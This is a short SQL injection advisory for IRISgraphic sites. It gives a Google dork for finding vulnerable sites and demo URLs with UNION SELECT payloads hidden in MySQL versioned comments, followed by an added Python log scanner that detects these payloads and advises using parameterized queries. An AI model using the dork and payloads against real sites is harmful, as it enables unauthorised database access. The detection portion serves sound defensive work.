# Exploit Title: IRISgraphic SQL Injection  
# Google Dork: "Powered by www.IRISgraphic.com"  
# Date: 2020.03.07  
# Exploit Author: Milad Karimi  
# Vendor Homepage: http://www.irisgraphic.com/  
# Software Link: http://www.irisgraphic.com/  
# Category : webapps  
# Version: 1.0  
# Tested on: Windows 10, Firefox  
# CVE : CWE-89  
  
################################################  
Proof of concept:  
  
SQL Injection Vulnerability  
1- Search Google Dork: "Powered by www.IRISgraphic.com"  
2- SQL injection  
  
  
  
Demo:  
http://site/kbe-lb/news.php?id=13/*!50000union*/%20select%201,2,3,4,5  
  
https://site/products.php?brand_id=2&&category_id=-36/*!50000union*/%20select%201,2,3,4%23  
  
http://site/alfazone/gallery-slider.php?id=5/*!50000union*/%20select%201%23  
  
#Discovered by : Milad Karimi
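
Added example (not part of the original advisory or the vendor's code): a Python access-log check for the pattern in the demo URLs above. It unwraps MySQL versioned comments such as /*!50000union*/ before looking for UNION SELECT in query parameters, and flags non-integer values in the ID parameters. The parameter list, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters shown in the advisory's demo URLs; assumed to be integer IDs.
NUMERIC_PARAMS = {"id", "brand_id", "category_id"}

# MySQL executable comment: /*!50000union*/ runs "union" on servers >= 5.0.0.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Unwrap versioned comments, drop plain ones, collapse whitespace."""
    value = VERSIONED_COMMENT.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()

def inspect_request(target):
    """Return [(param, reason)] for one request target (path?query)."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if UNION_SELECT.search(normalize(value)):
            findings.append((name, "union-select"))
        elif name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d{1,10}", value):
            findings.append((name, "non-integer"))
    return findings

def scan_log(lines):
    """Return [(line_number, param, reason)] for access-log lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits += [(number, p, r) for p, r in inspect_request(match.group(1))]
    return hits

# Constructed sample log (documentation IP ranges); payloads are the page's demo URLs.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Mar/2020:10:00:01 +0000] "GET /kbe-lb/news.php?id=13 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Mar/2020:10:00:05 +0000] "GET /kbe-lb/news.php?id=13/*!50000union*/%20select%201,2,3,4,5 HTTP/1.1" 200 5300',
    '198.51.100.7 - - [07/Mar/2020:10:00:09 +0000] "GET /products.php?brand_id=2&&category_id=-36/*!50000union*/%20select%201,2,3,4%23 HTTP/1.1" 200 4100',
    '192.0.2.11 - - [07/Mar/2020:10:00:12 +0000] "GET /products.php?brand_id=2&category_id=36 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same integer check belongs in the application itself: casting these parameters to integers and using parameterized queries removes the injection point rather than only detecting it.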